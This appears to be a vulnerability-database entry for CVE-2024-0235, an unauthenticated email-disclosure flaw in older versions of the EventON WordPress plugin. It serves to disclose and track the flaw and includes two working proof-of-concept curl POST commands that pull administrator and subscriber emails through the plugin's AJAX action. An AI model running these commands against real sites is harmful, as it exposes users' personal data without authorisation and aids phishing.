Lucene search
Erwan LR (WPScan)WPEX-ID:E370B99A-F485-42BD-96A3-60432A15A4E9HistoryJan 10, 2024 - 12:00 a.m.
EventON (Free < 2.2.8, Premium < 4.5.5) - Unauthenticated Email Address Disclosure
2024-01-1000:00:00
Erwan LR (WPScan)
29
eventon
unauthenticated
email disclosure
exploit
administrator
subscriber
0.004 Low
EPSS
Percentile
73.3%
Description The plugins do not have authorisation in an AJAX action, allowing unauthenticated users to retrieve email addresses of any users on the blog
To get the administrator user emails:
curl -X POST --data '_user_role=administrator' 'https://example.com/wp-admin/admin-ajax.php?action=eventon_get_virtual_users'
To get the subscriber user emails:
curl -X POST --data '_user_role=subscriber' 'https://example.com/wp-admin/admin-ajax.php?action=eventon_get_virtual_users'
etc to get othersRelated
prion
prion
Code injection
2024-01-16 16:15:00
cvelist
cvelist
wpvulndb
wpvulndb
nvd
nvd
CVE-2024-0235
2024-01-16 16:15:14
githubexploit
githubexploit
Exploit for Missing Authorization in Myeventon Eventon
2024-06-03 14:21:48
cve
cve
CVE-2024-0235
2024-01-16 16:15:14
nuclei
nuclei
EventON (Free < 2.2.8, Premium < 4.5.5) - Information Disclosure
2024-04-28 06:04:28